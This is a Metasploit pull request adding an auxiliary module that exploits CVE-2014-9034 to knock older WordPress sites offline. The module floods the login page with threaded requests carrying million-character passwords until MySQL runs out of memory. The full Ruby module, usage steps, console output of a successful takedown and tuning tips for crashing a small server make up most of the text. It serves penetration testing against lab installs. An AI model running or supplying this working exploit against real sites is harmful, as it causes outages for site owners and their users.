### PR TITLE
Add WordPress long password DoS module

### DIFF
--- a/lib/msf/http/wordpress/login.rb
+++ b/lib/msf/http/wordpress/login.rb
@@ -5,6 +5,7 @@ module Msf::HTTP::Wordpress::Login
   #
   # @param user [String] Username
   # @param pass [String] Password
+  # @param timeout [Integer] The maximum number of seconds to wait before the request times out
   # @return [String,nil] the session cookies as a single string on successful login, nil otherwise
   def wordpress_login(user, pass, timeout = 20)
     redirect = "#{target_uri}#{Rex::Text.rand_text_alpha(8)}"

--- a/lib/msf/http/wordpress/login.rb
+++ b/lib/msf/http/wordpress/login.rb
@@ -6,13 +6,13 @@ module Msf::HTTP::Wordpress::Login
   # @param user [String] Username
   # @param pass [String] Password
   # @return [String,nil] the session cookies as a single string on successful login, nil otherwise
-  def wordpress_login(user, pass)
+  def wordpress_login(user, pass, timeout = 20)
     redirect = "#{target_uri}#{Rex::Text.rand_text_alpha(8)}"
-    res = send_request_cgi(
+    res = send_request_cgi({
         'method' => 'POST',
         'uri' => wordpress_url_login,
         'vars_post' => wordpress_helper_login_post_data(user, pass, redirect)
-    )
+    }, timeout)
     if res && res.redirect? && res.redirection && res.redirection.to_s == redirect
       cookies = res.get_cookies
       # Check if a valid wordpress cookie is returned

--- a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb
+++ b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb
@@ -1,0 +1,145 @@
+##
+# This module requires Metasploit: http//www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::HTTP::Wordpress
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress Long Password DoS',
+      'Description'     => 'WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing.',
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Javier Nieto Arevalo',           # Vulnerability disclosure
+          'Andres Rojas Guerrero',          # Vulnerability disclosure
+          'Rob Carr <rob[at]rastating.com>' # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['URL', 'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034'],
+          ['OSVDB', '114857'],
+          ['WPVDB', '7681']
+        ],
+      'DisclosureDate'  => 'Nov 20 2014'
+    ))
+
+    register_options(
+      [
+        OptInt.new('PLENGTH', [true, 'Length of password to use', 1000000]),
+        OptInt.new('RLIMIT', [true, 'The number of requests to send', 1000]),
+        OptInt.new('THREADS', [true, 'The number of concurrent threads', 5]),
+        OptString.new('USERNAME', [true, 'The username to send the requests with', '']),
+        OptBool.new('VALIDATE_USER', [true, 'Validate the specified username', true])
+      ], self.class)
+  end
+
+  def rlimit
+    datastore['RLIMIT']
+  end
+
+  def plength
+    datastore['PLENGTH']
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def validate_user
+    datastore['VALIDATE_USER']
+  end
+
+  def thread_count
+    datastore['THREADS']
+  end
+
+  def wordpress_long_password_post_data(user, pass, redirect)
+    post_data = {
+      'log'         => user.to_s,
+      'pwd'         => pass.to_s,
+      'redirect_to' => redirect.to_s,
+      'reauth'      => 1,
+      'testcookie'  => '1',
+      'wp-submit'   => 'Login'
+    }
+
+    post_data
+  end
+
+  def wordpress_long_password_login(user, pass)
+    begin
+      redirect = "#{target_uri}wp-admin/"
+      res = send_request_cgi(
+        'method'      => 'POST',
+        'uri'         => wordpress_url_login,
+        'vars_post'   => wordpress_long_password_post_data(user, pass, redirect)
+      )
+
+      return res
+    rescue
+      return nil
+    end
+  end
+
+  def user_exists(user)
+    exists = wordpress_user_exists?(user)
+    if exists
+      print_good("#{peer} - Username \"#{username}\" is valid")
+      report_auth_info(
+        :host => rhost,
+        :sname => (ssl ? 'https' : 'http'),
+        :user => user,
+        :port => rport,
+        :proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}"
+      )
+
+      return true
+    else
+      print_error("#{peer} - \"#{user}\" is not a valid username")
+      return false
+    end
+  end
+
+  def run
+    if wordpress_and_online?
+      if validate_user
+        print_status("#{peer} - Checking if user \"#{username}\" exists...")
+        unless user_exists(username)
+          print_error('Aborting operation - a valid username must be specified')
+          return
+        end
+      end
+
+      starting_thread = 1
+      while starting_thread < rlimit do
+        ubound = [rlimit - (starting_thread - 1), thread_count].min
+        print_status("#{peer} - Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...")
+
+        threads = (1..ubound).map do |i|
+          Thread.new(i) do |i|
+            wordpress_long_password_login(username, Rex::Text.rand_text_alpha(plength))
+          end
+        end
+
+        threads.each(&:join)
+        print_good("#{peer} - Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}")
+        starting_thread += ubound
+      end
+
+      if wordpress_and_online?
+        print_error("#{peer} - FAILED: #{target_uri} appears to still be online")
+      else
+        print_good("#{peer} - SUCCESS: #{target_uri} appears to be down")
+      end
+    else
+      print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress")
+    end
+  end
+end

--- a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb
+++ b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb
@@ -102,8 +102,9 @@ class Metasploit3 < Msf::Auxiliary
         ubound = [rlimit - (starting_thread - 1), thread_count].min
         print_status("#{peer} - Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...")
 
-        threads = (1..ubound).map do |i|
-          Thread.new(i) do |i|
+        threads = []
+        1.upto(ubound) do |i|
+          threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|
             begin
               wordpress_login(username, Rex::Text.rand_text_alpha(plength), timeout)
             rescue => e


### PR DESCRIPTION
This module provides DoS functionality through the use of a flaw in WordPress versions <= 4.0 which does not cap the maximum length of the passwords being posted when logging in. 

By not validating the password lengths it's possible to submit long passwords and cause a substantially large bottleneck on the server which results in the MySQL service crashing due to the server running out of memory.
## References
- http://osvdb.org/show/osvdb/114857
- https://wpvulndb.com/vulnerabilities/7681
- http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
## Verification
- [ ] Setup a LAMP or WAMP server running the latest versions of each package
- [ ] Download WordPress 4.0 from https://wordpress.org/wordpress-4.0.tar.gz
- [ ] Install WordPress, making note of the username chosen during installation
- [ ] Run msfconsole
- [ ] Use the module: `use auxiliary/dos/http/wordpress_long_password_dos`
- [ ] Set RHOST to the target's address
- [ ] Set USERNAME to match the username used during installation or a random string if testing the user validation
- [ ] Set RLIMIT to be the maximum number of requests to be sent
- [ ] Set THREADS to be the maximum number of concurrent threads to use (the higher the more affective the attack)
- [ ] Run the module, example outputs from various scenarios can be found below.
## Example Output
### Successful DoS with User Validation

```

msf > use auxiliary/dos/http/wordpress_long_password_dos
msf auxiliary(wordpress_long_password_dos) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf auxiliary(wordpress_long_password_dos) > set RLIMIT 200
RLIMIT => 200
msf auxiliary(wordpress_long_password_dos) > set THREADS 50
THREADS => 50
msf auxiliary(wordpress_long_password_dos) > set USERNAME root
USERNAME => root
msf auxiliary(wordpress_long_password_dos) > set TARGET_URI /wordpress
TARGET_URI => /wordpress
msf auxiliary(wordpress_long_password_dos) > run

[*] 192.168.1.15:80 - Checking if user "root" exists...
[+] 192.168.1.15:80 - Username "root" is valid
[*] 192.168.1.15:80 - Executing requests 1 - 50...
[+] 192.168.1.15:80 - Finished executing requests 1 - 50
[*] 192.168.1.15:80 - Executing requests 51 - 100...
[+] 192.168.1.15:80 - Finished executing requests 51 - 100
[*] 192.168.1.15:80 - Executing requests 101 - 150...
[+] 192.168.1.15:80 - Finished executing requests 101 - 150
[*] 192.168.1.15:80 - Executing requests 151 - 200...
[+] 192.168.1.15:80 - Finished executing requests 151 - 200
[+] 192.168.1.15:80 - SUCCESS: /wordpress/ appears to be down
[*] Auxiliary module execution completed
```

_Resources being consumed by Apache during attack_
![lamp_top](https://cloud.githubusercontent.com/assets/2500434/5607224/c450f338-9449-11e4-9faf-8155d2d97e67.png)

_MySQL service crash once out of memory_
![lamp_oom](https://cloud.githubusercontent.com/assets/2500434/5607229/07220de6-944a-11e4-85be-e9230a67b9ac.png)

_One of the WordPress error pages that is shown when it is unable to establish a connection to MySQL_
![wordpress](https://cloud.githubusercontent.com/assets/2500434/5607232/2756c19c-944a-11e4-9d87-97d3758a0480.png)
### Attempt at Running Against a Non-WordPress Target

```
msf auxiliary(wordpress_long_password_dos) > run

[-] 192.168.1.15:80/wordpress/ does not appear to be running WordPress
[*] Auxiliary module execution completed
```
### Attempt at Running With an Invalid User with User Validation Enabled

```
msf auxiliary(wordpress_long_password_dos) > run

[*] 192.168.1.15:80 - Checking if user "invaliduser" exists...
[-] 192.168.1.15:80 - "invaliduser" is not a valid username
[-] Aborting operation - a valid username must be specified
[*] Auxiliary module execution completed
```
### Attempt at Running With an Invalid User with User Validation Disabled

```
msf auxiliary(wordpress_long_password_dos) > run

[*] 192.168.1.15:80 - Executing requests 1 - 5...
[+] 192.168.1.15:80 - Finished executing requests 1 - 5
[-] 192.168.1.15:80 - FAILED: /wordpress/ appears to still be online
[*] Auxiliary module execution completed
```
## Potentially Useful Notes for Testing

During testing, the quickest result I had was on a virtual machine running Ubuntu 14.04 x64 with 512mb of memory, it takes around 100 requests with a thread count of 50 to crash the service.
